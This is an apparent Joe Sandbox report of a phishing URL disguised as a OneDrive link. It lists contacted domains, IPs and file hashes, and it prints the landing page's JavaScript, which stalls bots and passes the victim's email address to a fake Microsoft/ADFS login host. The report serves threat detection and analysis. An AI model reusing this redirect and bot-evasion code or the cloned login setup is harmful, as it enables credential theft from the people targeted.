      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1648503 URL: https://proposaldocumentsvi... Startdate: 25/03/2025 Architecture: WINDOWS Score: 56 22 AI detected phishing page 2->22 24 Yara detected HtmlPhish54 2->24 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49375 unknown unknown 6->14 11 chrome.exe 6->11         started        process5 dnsIp6 16 sso.ninerscorretora.com.br 103.114.43.73, 443, 49746, 49747 SLN-AS-APSLNBD Bangladesh 11->16 18 rutaann.com 11->18 20 21 other IPs or domains 11->20

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/92612908588842830%Avira URL Cloudsafe
      https://sso.ninerscorretora.com.br/favicon.ico0%Avira URL Cloudsafe
      https://proposaldocumentsviasecuredport.com/favicon.ico0%Avira URL Cloudsafe
      https://sso.ninerscorretora.com.br/?mjalaytm&email=0%Avira URL Cloudsafe
      https://rutaann.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs0%Avira URL Cloudsafe
      https://rutaann.com/adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC09600%Avira URL Cloudsafe
      https://rutaann.com/favicon.ico0%Avira URL Cloudsafe
      https://rutaann.com/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js0%Avira URL Cloudsafe
      https://rutaann.com/adfs/portal/css/style.css?id=662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E0%Avira URL Cloudsafe
      https://rutaann.com/adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC370%Avira URL Cloudsafe
      https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
      https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?0%Avira URL Cloudsafe
      https://rutaann.com/adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D30%Avira URL Cloudsafe

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      proposaldocumentsviasecuredport.com
      104.21.92.117
      truefalse
        unknown
        s-part-0010.t-0009.t-msedge.net
        13.107.246.38
        truefalse
          high
          s-part-0012.t-0009.t-msedge.net
          13.107.246.40
          truefalse
            high
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              rutaann.com
              103.114.43.73
              truetrue
                unknown
                challenges.cloudflare.com
                104.18.95.41
                truefalse
                  high
                  www.google.com
                  142.250.80.100
                  truefalse
                    high
                    gig-ai-g-prod-eastus-1-app-v4-tag.eastus.cloudapp.azure.com
                    52.179.73.57
                    truefalse
                      high
                      sso.ninerscorretora.com.br
                      103.114.43.73
                      truefalse
                        unknown
                        dc.services.visualstudio.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283false
                          • Avira URL Cloud: safe
                          unknown
                          https://a.nel.cloudflare.com/report/v4?s=sBAgcOpK86giaC%2Fx9qnmphHzWfkaIF8kEQYWigUtpsbwtXcvezGaMJDfavhkUT7fa9lAPo7RL532xcc4rdRZ0RGlNk2gbe6lz45dGker0C7fhN0HH9dIYUxZ%2FgEsgF4LHgbFVgjdcEILD9Rz%2FUbAus5ZDTouVg%3D%3Dfalse
                            high
                            https://a.nel.cloudflare.com/report/v4?s=7jbkxu4mns%2FD4i7vTYCTE8WTuUHzvYIXuWy8oFxgOXK67DzEgbSvqmqBnk%2FzwMzaDTbiAZE0c1pelBWVavwbhN%2F%2B5kK8HCPfi02O7k64So8ofCD8pL0PAUt%2FAtF11x%2Froalc%2F9qkIpEbWB6VewJtpiQHJfNJWQ%3D%3Dfalse
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfdfalse
                                high
                                https://rutaann.com/adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960false
                                • Avira URL Cloud: safe
                                unknown
                                https://sso.ninerscorretora.com.br/favicon.icofalse
                                • Avira URL Cloud: safe
                                unknown
                                https://proposaldocumentsviasecuredport.com/favicon.icofalse
                                • Avira URL Cloud: safe
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9261293dee55c468&lang=autofalse
                                  high
                                  https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9261293dee55c468/1742934575128/d51fc97ff5482a0e04d34c34824eb01eb3128cda53b4a0f70f6023263fe47e26/uPY28BXx41_v6Yhfalse
                                      high
                                      https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                        high
                                        https://rutaann.com/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dc.services.visualstudio.com/v2/trackfalse
                                          high
                                          https://rutaann.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                            high
                                            https://rutaann.com/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://rutaann.com/adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOIfalse
                                              high
                                              https://a.nel.cloudflare.com/report/v4?s=MdD2B%2FKtKxUf49Q%2BiEUqJPicetOC336V638UqNqvbhYY%2F1TExLbb8dagiaq8N61MpFdZX360bMTOn1ndi0QR3JziZyxEpymiRSgTx57%2Fl5pX8eC%2FLlioHYwsSYg6Qe%2Bum2P6sHQYqlxGhLcTWgmUl3BsYnOx7Q%3D%3Dfalse
                                                high
                                                https://rutaann.com/adfs/portal/css/style.css?id=662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057Efalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://rutaann.com/adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/false
                                                  high
                                                  https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://knockoutjs.com/chromecache_80.2.drfalse
                                                    high
                                                    https://github.com/douglascrockford/JSON-jschromecache_80.2.drfalse
                                                      high
                                                      http://www.opensource.org/licenses/mit-license.php)chromecache_80.2.drfalse
                                                        high
                                                        https://sso.ninerscorretora.com.br/?mjalaytm&email=chromecache_74.2.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.21.92.117
                                                        proposaldocumentsviasecuredport.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.80.100
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        172.67.192.251
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.18.95.41
                                                        challenges.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        52.179.73.57
                                                        gig-ai-g-prod-eastus-1-app-v4-tag.eastus.cloudapp.azure.comUnited States
                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        103.114.43.73
                                                        rutaann.comBangladesh
                                                        137707SLN-AS-APSLNBDtrue
                                                        35.190.80.1
                                                        a.nel.cloudflare.comUnited States
                                                        15169GOOGLEUSfalse
                                                        IP
                                                        192.168.2.4
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1648503
                                                        Start date and time:2025-03-25 21:28:16 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 29s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:20
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal56.phis.win@25/34@26/8
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 142.251.35.174, 142.251.40.131, 142.251.32.110, 192.178.155.84, 142.250.80.14, 142.250.80.46, 142.251.40.174, 142.251.41.10, 142.251.40.106, 142.251.40.170, 142.251.40.138, 142.250.80.42, 142.250.65.202, 142.250.176.202, 142.250.64.106, 142.250.80.106, 142.250.80.10, 142.250.72.106, 142.251.40.202, 142.251.40.234, 142.250.64.74, 142.250.65.170, 142.250.80.74, 23.203.176.221, 23.210.73.5, 142.251.40.110, 142.250.80.110, 172.217.165.138, 142.250.80.3, 172.217.165.142, 142.250.80.99, 184.31.69.3, 204.79.197.222, 4.245.163.56, 13.107.246.38, 13.107.246.40, 172.202.163.200
                                                        • Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, az416426.vo.msecnd.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, ocsp.digicert.com, update.googleapis.com, csp.microsoft.com, clients.l.google.com, c.pki.goog
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):22
                                                        Entropy (8bit):3.6978458230844122
                                                        Encrypted:false
                                                        SSDEEP:3:jAbukMn:jP
                                                        MD5:6AAB5444A217195068E4B25509BC0C50
                                                        SHA1:7B22EAF7EAA9B7E1F664A0632D3894D406FE7933
                                                        SHA-256:FC5525D427BFA27792D3A87411BE241C047D07F07C18E2FC36BF00B1C2E33D07
                                                        SHA-512:AA5F66638B142B5E6D1D008F2934530C7AAD2F7F19128CA24609825D0DACFFD25A77591BFD7FB1D225BE2FA77CABCE837E0741326C1AC622C244D51E6FAFB303
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://sso.ninerscorretora.com.br/favicon.ico
                                                        Preview:<h1>Access Denied</h1>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (523), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):31224
                                                        Entropy (8bit):4.956986074107961
                                                        Encrypted:false
                                                        SSDEEP:384:xectSjXOmsnslOERMYu+WlB8skjhjobWwUfE:kcQOj6weE
                                                        MD5:691A8D68C2156B314142B8B43208609A
                                                        SHA1:3BE7D9DCF4592433E67E284FBA8EDAB274BACD82
                                                        SHA-256:A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37
                                                        SHA-512:D97B30640C248BDB3DABACA3F3746E3A6F55F0363EA60AE6A43C615AE5ED310E3E16FDD1A828409C539FEAFCB2F5DED4DEC75A972972D1FA67D19F63A43EE392
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rutaann.com/adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37
                                                        Preview:* {.. margin: 0px;.. padding: 0px;..}....html, body {.. height: 100%;.. width: 100%;.. background-color: #ffffff;.. color: #000000;.. font-weight: normal;.. font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";.. -ms-overflow-style: -ms-autohiding-scrollbar;..}....body {.. font-size: 0.9em;..}....#noScript {.. margin: 16px;.. color: Black;..}....:lang(en-GB) {.. quotes: '\2018' '\2019' '\201C' '\201D';..}....:lang(zh) {.. font-family: ....;..}....@-ms-viewport {.. width: device-width;..}....@-moz-viewport {..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, baseline, precision 8, 1920x1080, components 3
                                                        Category:downloaded
                                                        Size (bytes):17453
                                                        Entropy (8bit):3.890509953257612
                                                        Encrypted:false
                                                        SSDEEP:192:P7FRTHQpmA3ZkXOL25cYty7l6UWUjMJBSab/vR+yzP:P/cpmgkF5+JWUjMp40P
                                                        MD5:7916A894EBDE7D29C2CC29B267F1299F
                                                        SHA1:78345CA08F9E2C3C2CC9B318950791B349211296
                                                        SHA-256:D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3
                                                        SHA-512:2180ABE47FBF76E2E0608AB3A4659C1B7AB027004298D81960DC575CC2E912ECCA8C131C6413EBBF46D2AAA90E392EB00E37AED7A79CDC0AC71BA78D828A84C7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rutaann.com/adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3
                                                        Preview:.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):32
                                                        Entropy (8bit):4.413909765557392
                                                        Encrypted:false
                                                        SSDEEP:3:HAXEzthj+21:CQ5+Q
                                                        MD5:4A32AF314729B3C66EFCEF19720B21B6
                                                        SHA1:A4B2B55267A0C0A49AEC3DF82975F6960E4AE860
                                                        SHA-256:29A61A6C9F51F9850CC4327AA54478B3A7290E2B5E7592BAC2964B9DC72D3F00
                                                        SHA-512:CE556C2E3CD83C097EB2CC07F85CE206C37BD5DED3794D886A9D86F89A2CFA4246FA68E65E250E0553982893223E2856DD855F3ECC0828464175C62F091FE03B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCezmJ949NcX0EgUNAaVpciHPvl_OoCDOQxIZCSz1LDwChrgpEgUNZSGZ6iG2EUSKjV1VjA==?alt=proto
                                                        Preview:CgkKBw0BpWlyGgAKCQoHDWUhmeoaAA==
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):16
                                                        Entropy (8bit):3.75
                                                        Encrypted:false
                                                        SSDEEP:3:HlpiCkY:FMCR
                                                        MD5:1C00791C6499AE9E2B8C2690A8EF6238
                                                        SHA1:6B6189E52D08CCED40FDEEB3D2D95D6632DEB892
                                                        SHA-256:69D57ADAC4C4FDE0A89BE69A2D3E9C994CD197E281E78833F47BEF2758BD537A
                                                        SHA-512:E5E187E5DE613E76B0E35604715DEBA7B4923ADF7BFB3E1EEFCA683C7D92495155ECD2978AB718E19EA7252091138370F2CDF843AF070D5910B1A1F2141EAA5B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCej1A3f8wfaMEgUNH8rLSiGV1mTmNqg0YQ==?alt=proto
                                                        Preview:CgkKBw0fystKGgA=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):96705
                                                        Entropy (8bit):5.228470338380378
                                                        Encrypted:false
                                                        SSDEEP:1536:EVpXOWPGHRGUvJEzxPNLgyLuG6XV3yV/QtJ+j1YeO4PFWYit:EVoWPGHRGUvJEzxOMQV3yV/ERaNWYit
                                                        MD5:1DD63DE72CF1F702324245441844BE13
                                                        SHA1:58A8BDCDCB398AF7DB424357DF70DF18E7B30E9D
                                                        SHA-256:5201C813C37A4168CC5C20C701D4391FD0A55625F97EB9F263A74FB52B52FD0E
                                                        SHA-512:532D1E907B433AB97785CF632D9637A957152BAF0BA57879C856CBAA469BFFECA22C4F99485679539944B27068D39E70F7D44282594F999142454DA57329A11B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://az416426.vo.msecnd.net/scripts/a/ai.0.js
                                                        Preview:"use strict";var AI,Microsoft,__extends=this&&this.__extends||function(){var i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n])};return function(e,t){function n(){this.constructor=e}i(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}}();function _endsWith(e,t){var n=e.length,i=n-t.length;return e.substring(0<=i?i:0,n)===t}!function(e){e.ApplicationInsights||(e.ApplicationInsights={})}(Microsoft||(Microsoft={})),function(e){var t;t=function n(){},(e.Telemetry||(e.Telemetry={})).Base=t}(Microsoft||(Microsoft={})),function(e){var t;t=function n(){this.ver=1,this.sampleRate=100,this.tags={}},(e.Telemetry||(e.Telemetry={})).Envelope=t}(Microsoft||(Microsoft={})),function(e){var t;(t=e.ApplicationInsights||(e.ApplicationInsights={})).Context||(t.Context={})}(Microsoft||(Microsoft={})),function(e){var t;(t=e.ApplicationInsights||(e.ApplicationInsights={})).Context||(t.Co
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):4054
                                                        Entropy (8bit):7.797012573497454
                                                        Encrypted:false
                                                        SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                        MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                        SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                        SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                        SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rutaann.com/adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                        Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (945), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):2359
                                                        Entropy (8bit):5.127185843892456
                                                        Encrypted:false
                                                        SSDEEP:48:wUq0dXdiYwkUMyJPqZeDtHFodlPCBKGHGLrGWCSTw2wptI8Id62:w30dXdip9JPgitlWn8Nnx/IH
                                                        MD5:019AAB1BB3D24A1EB263C8D86F5BDC8C
                                                        SHA1:2631E032A7F40D7111B85C54F2E6BFBC21CE6316
                                                        SHA-256:2AD0F29A701AD994C62D31DA2B621F8FBE7F5193FFA44D12CEDB85E5B690F6DC
                                                        SHA-512:8E079E9089607EA3EB4B45DF184F9EB86E20734C54830AEEB37EEE97B9FC66757CC2FF8BF2AB9C23349F27EA44808328C07F7143343A8CF770760558D95D71F8
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
                                                        Preview:<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />..<title>OneDrive</title>..<script type="text/javascript">.. // Time delay (to prevent immediate bot activity).. let timer;.. const minTime = 5000; // Minimum 5 seconds on the page before allowing redirection.... // This function runs when the page is loaded.. window.onload = function() {.. timer = setTimeout(enableRedirection, minTime); // Start the countdown.. };.... function enableRedirection() {.. // Only redirect if JavaScript runs and minimum time on the page is spent.. const email = "john.smith@microsoft.com";.. window.location.href = "https://sso.ninerscorretora.com.br/?mjalaytm&email=" + email;.. }.... // Honeypot field to catch bots.. function checkHoneypot() {.. var honeypotField = document.getElementById("honeypot").value;.. if (honeypotField !== "") {.. // If the hon
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, baseline, precision 8, 1920x1080, components 3
                                                        Category:dropped
                                                        Size (bytes):17453
                                                        Entropy (8bit):3.890509953257612
                                                        Encrypted:false
                                                        SSDEEP:192:P7FRTHQpmA3ZkXOL25cYty7l6UWUjMJBSab/vR+yzP:P/cpmgkF5+JWUjMp40P
                                                        MD5:7916A894EBDE7D29C2CC29B267F1299F
                                                        SHA1:78345CA08F9E2C3C2CC9B318950791B349211296
                                                        SHA-256:D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3
                                                        SHA-512:2180ABE47FBF76E2E0608AB3A4659C1B7AB027004298D81960DC575CC2E912ECCA8C131C6413EBBF46D2AAA90E392EB00E37AED7A79CDC0AC71BA78D828A84C7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):4054
                                                        Entropy (8bit):7.797012573497454
                                                        Encrypted:false
                                                        SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                        MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                        SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                        SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                        SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                        Malicious:false
                                                        Reputation:low
